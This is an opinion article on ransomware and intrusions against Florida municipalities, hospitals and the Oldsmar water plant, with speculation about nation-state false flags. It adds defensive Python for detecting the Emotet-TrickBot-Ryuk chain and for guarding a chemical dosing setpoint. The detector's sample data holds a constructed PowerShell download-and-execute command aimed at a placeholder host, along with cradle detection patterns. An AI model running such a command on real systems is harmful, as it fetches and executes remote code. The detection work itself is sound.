In cyber defense there are three main categories of adversary behind any attack. First are those who attack for money: the classic cyber criminals and gangs behind most ransomware. Second are hacktivists, who attack for political reasons. Third are nation states, which conduct cyber warfare for ends that are sometimes explicit and sometimes covert.
Since 2016, Florida has seen a peculiar rise in cyber attacks, specifically against municipalities. Most of these attacks go underreported and are attributed to cyber criminals. The lack of media attention these attacks have received is, to say the least, dangerous. Attributing them to mere cyber bullies waters down the seriousness of the situation. The following short report is meant to inform the reader of the current cyber landscape in Florida and to make them question that narrative.
February 2016, Sarasota, FL: Locky ransomware delivered by phishing; $33 million demanded, not paid
May 2018, Palm Springs, FL: Amnesia 3 ransomware; $1,200 ransom paid
December 2018, Collier County, FL: phishing; $184,000 lost
May 2019, Riviera Beach, FL: type not reported; $600,000 ransom paid
June 10, 2019, Lake City, FL: Triple Threat (Emotet, TrickBot, Ryuk); $485,000 ransom paid
June 2019, Key Biscayne, FL: Triple Threat (Emotet, TrickBot, Ryuk); $600,000 ransom paid
August 2019, Naples, FL: phishing; $700,000 lost
December 2019, Pensacola, FL: Maze ransomware; ransom not stated here
September 2020, Universal Health Services (facilities in Florida): Ryuk ransomware delivered by phishing; ransom not stated here
February 2021, Oldsmar Water Treatment Facility, FL: remote intrusion into the plant's treatment control software (discussed below); no ransom involved
Sarasota, Florida: The Testing Grounds
160,000 city files were encrypted and $33 million worth of Bitcoin was demanded to get them back. It could have been worse, but a quick decision to literally pull the plug on the city government's network prevented further data loss. The attack happened in February of 2016 but was only disclosed six months later.
The Sarasota attack was not random. The FBI disclosed to the city that a photo showing the city's email system had been found in an Islamic State propaganda video. The Islamic State was not the only adversary probing Sarasota's systems: a few months later, a city employee's entire email inbox was the subject of a public records request sent from an account on a Russian-based server.
This was the first time a Florida municipality had drawn the attention of not one but two international adversaries. Why Sarasota specifically was attacked is not clear, but what is clear is that from this attack onward Florida has experienced an increase in ransomware-style attacks.
Attack Resurgence: Palm Springs, Florida 2018
An Amnesia 3 ransomware infection, delivered by phishing, hit Palm Springs, Florida in May of 2018, marking a resurgence of ransomware activity in the state. Since Sarasota, Florida has been hit with various types of attacks, and Palm Springs was the first of many that began targeting the Sunshine State and its municipalities.
Coming near the middle of 2018, the Palm Springs attack set off a chain of more than five further attacks, most of them in 2019. Each affected municipality had a similar experience, but not every attack was the same.
Ryuk, the most commonly used, is targeted ransomware that was originally linked to the North Korean "Lazarus" threat group; according to later reports it has been adopted by non-state criminal ransomware operators as well. It comes with a tailored ransom note that directs victims to contact the attackers by email. It has been known to lie dormant on a compromised network for up to a year before executing.
A Triple Threat attack (Lake City and Riviera Beach), described in an April 2019 report by Cybereason, starts with a malicious document that uses a PowerShell script to download the Emotet trojan. Emotet has been used in the past to steal banking information, but it can also serve as a "dropper" that installs additional malware, in this case the TrickBot trojan.
TrickBot (Key Biscayne) is another piece of commodity malware. A modular bit of nastiness, it carries a number of tools for moving laterally across the network from the initial point of compromise, the computer of the person who opened the attachment. Those modules include password grabbers, a PowerShell-based reconnaissance tool built on the open-source PowerShell Empire framework, and spreader_x64.dll, a lateral-movement tool built on EternalBlue, the leaked National Security Agency exploit for a vulnerability in Windows' Server Message Block version 1 (SMBv1) file-sharing protocol. spreader_x64.dll also bundles the well-worn mimikatz credential-stealing tool, so that it can harvest credentials and copy itself with them when the EternalBlue exploit fails.
Once TrickBot has established itself, the attackers use it to examine where their malware has landed and decide on a next step. From there, they use any harvested credentials to infect other systems. In an attack examined by Cybereason, TrickBot was used to compromise a Windows domain controller, gather data on the victim's Active Directory structure, identify servers on the network, connect to them, and then infect them all with Ryuk.
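The chain just described (an Office document, a PowerShell download cradle, then SMB-based spreading with EternalBlue or stolen credentials) leaves telemetry a defender can match on. The following is an added example, not code from this article or from Cybereason: a small Python detector run over constructed Sysmon-style process-creation and network-connection records. It decodes -EncodedCommand PowerShell launched by an Office application, flags download-cradle keywords in the decoded script, and flags a single host opening SMB (port 445) connections to many distinct peers in a short window. The host names, IP addresses, thresholds and the example.invalid URL are assumptions chosen for illustration.

```python
"""Added example, not from the article: detection logic for the Emotet -> TrickBot -> Ryuk
chain, run over constructed Sysmon-style events. Every event below is made up."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Office applications whose child processes Emotet-style macros abuse.
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
# Script hosts a malicious macro typically launches.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe")
# Download-cradle indicators looked for in the (decoded) PowerShell command line.
CRADLE_PATTERNS = {
    "IEX": r"\biex\b|invoke-expression",
    "WebClient": r"net\.webclient",
    "DownloadString": r"downloadstring",
    "DownloadFile": r"downloadfile",
    "Start-Process": r"start-process",
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_powershell(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def cradle_indicators(script):
    """Names of the download-cradle patterns present in a script."""
    return [name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, script, re.I)]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def office_spawned_script_host(ev):
    """True when an Office application is the parent of a script host (macro execution)."""
    return (_basename(ev.get("parent_image", "")) in OFFICE_APPS
            and _basename(ev.get("image", "")) in SCRIPT_HOSTS)


def smb_fan_out(events, threshold=5, window=timedelta(minutes=2)):
    """Hosts that opened SMB connections to at least `threshold` distinct peers within `window`.
    A workstation normally talks SMB to a handful of file servers; one host sweeping many
    peers on 445 looks like EternalBlue or credential-based spreading."""
    by_src = defaultdict(list)
    for ev in events:
        if ev.get("type") == "network" and ev.get("dst_port") == 445:
            by_src[ev["host"]].append((ev["ts"], ev["dst_ip"]))
    hits = {}
    for host, conns in by_src.items():
        conns.sort()
        for i, (t0, _) in enumerate(conns):
            targets = {ip for t, ip in conns[i:] if t - t0 <= window}
            if len(targets) >= threshold:
                hits[host] = targets
                break
    return hits


def analyze(events):
    """Run both rules and return a list of alert dicts."""
    alerts = []
    for ev in events:
        if ev.get("type") == "process" and office_spawned_script_host(ev):
            script = decode_encoded_powershell(ev["cmdline"]) or ev["cmdline"]
            alerts.append({"rule": "office_child_process", "host": ev["host"],
                           "decoded": script, "indicators": cradle_indicators(script)})
    for host, targets in smb_fan_out(events).items():
        alerts.append({"rule": "smb_fan_out", "host": host, "targets": sorted(targets)})
    return alerts


# ---- constructed sample telemetry (not real data) ----
T0 = datetime(2019, 6, 10, 8, 0, 0)
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/inv.ps1')"
CONSTRUCTED_ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ws01: Word launches hidden, encoded PowerShell (the Emotet delivery stage)
    {"type": "process", "ts": T0, "host": "ws01", "image": PS,
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + CONSTRUCTED_ENCODED},
    # ws02: an administrator running PowerShell from Explorer (benign)
    {"type": "process", "ts": T0 + timedelta(minutes=1), "host": "ws02", "image": PS,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe Get-Process"},
    # ws02: a single SMB connection to the file server (benign)
    {"type": "network", "ts": T0 + timedelta(minutes=5), "host": "ws02",
     "dst_ip": "10.0.0.5", "dst_port": 445},
] + [
    # ws01: thirty minutes later, SMB to eight different peers within 70 seconds (spreading)
    {"type": "network", "ts": T0 + timedelta(minutes=30, seconds=10 * i), "host": "ws01",
     "dst_ip": f"10.0.0.{10 + i}", "dst_port": 445}
    for i in range(8)
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Both rules are deliberately narrow: an Office parent of a script host is rare on a managed workstation, and the SMB fan-out threshold should be tuned against a baseline of what each host class normally talks to. The dormant period the text mentions is why the two rules are kept separate: the macro alert and the spreading alert may be weeks apart, so neither should wait for the other.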
The question to ask is: who is doing this, and why? Every article I have read assumes these are criminal actors. But what if they aren't? What if these are nation states disguising themselves as criminals? Are these false flags? Further, what if these city databases aren't the real target after all? Taking hold of a city's or hospital's data is hostile in and of itself, but what if it serves as a distraction for a deeper cyber attack, one that won't reveal itself until it is too late?
“False flags in cyberspace are significantly different and much easier to carry out than in the physical world. Cyber false flags refer to tactics applied by cunning perpetrators in covert cyber attacks to deceive or misguide attribution attempts, including the attacker’s origin, identity, movement, and exploitation. It is typically very hard to conclusively attribute cyber attacks to their perpetrators, and misdirection tactics can cause misattribution (permitting response and counterattack, which can lead to retaliation against the wrong party).”
The goal of any false flag is twofold: 1) to steer investigators away from the real perpetrator, and 2) to pin the blame on some third party. At the nation-state level, incorrect attribution of a cyber attack can be catastrophic. Although war policy has not caught up with the cyber realm, accusing a nation state of a damaging hack could come very close to a declaration of war.
Recall that in the Sarasota attack, one of the key indicators of foreign action was a Russian-based server. The question becomes: was this really a Russian-based server, or was it a false flag? Note that a server's location only tells you where it is hosted, not who operates it; infrastructure in any country can be rented, proxied through, or compromised by anyone, which is exactly what makes this kind of indicator so easy to plant.
On The Verge Of Casualties
In the early hours of Sunday, September 27th, 2020, Universal Health Services, which operates multiple facilities in Florida, was the victim of a cyber attack (another Ryuk attack).
“One anonymous user said the attack occurred around 2AM on Sunday morning. The attack began shutting down systems in the emergency department, quickly proliferating across the network. It appears antivirus was disabled by the attack, and hard drives lit up with activity before all computers shut down. UHS IT teams directed staff to keep the computers offline.”
Shutting down a few hospitals in a localized region is enough to cause a crisis. Shutting down a few hospitals during a flu season, a pandemic, or a biological attack is enough to cause mass casualties through a variety of network effects.
At a press conference in February 2021, local officials in the Tampa Bay area announced that someone had infiltrated the computer systems controlling Oldsmar’s water treatment plant and raised the setpoint for lye, or sodium hydroxide, in the water more than a hundredfold. That amount of lye would have effectively poisoned the water supply.
Some sort of third party “took control of the mouse, directed it to the software that controls water treatment, worked inside it for three to five minutes and increased the amount of sodium hydroxide from 100 parts per million to 11,100 parts per million.”
“The public was never in danger,” Pinellas County Sheriff Gualtieri said of the incident.
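The check that would have stopped a change like this belongs below the operator's screen, in PLC or safety-interlock logic, because an attacker who holds the HMI session can click anything the operator can. The following Python setpoint guard is an added example written for this article, not code from the Oldsmar plant or any vendor: it enforces hard engineering bounds on the sodium hydroxide dose, limits how far a single change may move the setpoint, requires local confirmation for changes made from a remote session, and keeps an audit trail. The 100 ppm and 11,100 ppm values come from the incident as described above; the 300 ppm ceiling, the 50% step rule and the "remote" session flag are assumed policy for illustration.

```python
"""Added example, not from the article: a dosing setpoint guard meant to sit below the HMI,
in PLC or safety-interlock logic. All limits and policy values are assumptions."""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class DosingLimits:
    # Hard engineering bounds for the sodium hydroxide dose, in ppm (assumed values).
    min_ppm: float = 0.0
    max_ppm: float = 300.0
    # Largest single change allowed, as a fraction of the current setpoint (assumed policy).
    max_step_fraction: float = 0.5
    # Changes from a remote session need a local confirmation (assumed policy).
    remote_requires_confirmation: bool = True


@dataclass
class SetpointGuard:
    limits: DosingLimits
    current_ppm: float
    audit: List[str] = field(default_factory=list)

    def request(self, new_ppm: float, source: str, locally_confirmed: bool = False) -> bool:
        """Apply the change and return True if it passes every check; otherwise log and refuse.
        `source` is "local" for the control-room console or "remote" for a remote-access session."""
        reason = self._reject_reason(new_ppm, source, locally_confirmed)
        if reason:
            self.audit.append(f"REJECT {source}: {self.current_ppm} -> {new_ppm} ppm ({reason})")
            return False
        self.audit.append(f"ACCEPT {source}: {self.current_ppm} -> {new_ppm} ppm")
        self.current_ppm = new_ppm
        return True

    def _reject_reason(self, new_ppm: float, source: str, locally_confirmed: bool) -> Optional[str]:
        lim = self.limits
        # 1. Engineering limits: the HMI cannot ask for a dose the process must never deliver.
        if not (lim.min_ppm <= new_ppm <= lim.max_ppm):
            return f"outside engineering limits {lim.min_ppm}-{lim.max_ppm} ppm"
        # 2. Rate of change: a jump far beyond the normal operating band is refused even if in range.
        if self.current_ppm > 0 and abs(new_ppm - self.current_ppm) / self.current_ppm > lim.max_step_fraction:
            return f"step exceeds {lim.max_step_fraction:.0%} of current setpoint"
        # 3. Session policy: a remote session alone cannot change dosing.
        if source == "remote" and lim.remote_requires_confirmation and not locally_confirmed:
            return "remote change without local confirmation"
        return None


if __name__ == "__main__":
    guard = SetpointGuard(DosingLimits(), current_ppm=100.0)
    # The Oldsmar change: 100 ppm -> 11,100 ppm from a remote session.
    guard.request(11100.0, source="remote")
    # A routine adjustment made locally.
    guard.request(110.0, source="local")
    for line in guard.audit:
        print(line)
```

The order of the checks matters: the engineering limit is evaluated first so that an out-of-range request is rejected regardless of who made it, and the audit line records the source, so a "remote" rejection at 2 a.m. is itself a detection signal worth alerting on.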
Are We Prepared?
With each cyber intrusion there is a public official, public servant, IT professional, or spokesperson reiterating the integrity of the current system and their efforts to fix it. This is understandable in many regards.
First, the public still does not fully understand the physical ramifications of cyber attacks. Documentaries about Stuxnet are cool and informative but focus on big government and military involvement. Your local government having money stolen is awful but does not change your day-to-day life. However, we are finally moving beyond that.
“Our systems are down, we cannot get your lab results at this time,” are not encouraging words for someone whose life depends on those results. The Oldsmar attack would have been very real to an entire population had it succeeded. Imagining an attack on our healthcare system coordinated with an Oldsmar-style attack can only trigger the worst in one’s imagination.
Voting is the hottest topic in cyber security, placing it at the forefront. This has caused the political class and the public to overlook the decaying cyber infrastructure that could affect their very lives as soon as tomorrow, or even right now. My assumption when I finish writing this article is that when I stand up to fill my cup with water from my fridge, that water will hydrate me, not kill me. My hope is that I can continue to assume so.
Written by Samuel Armes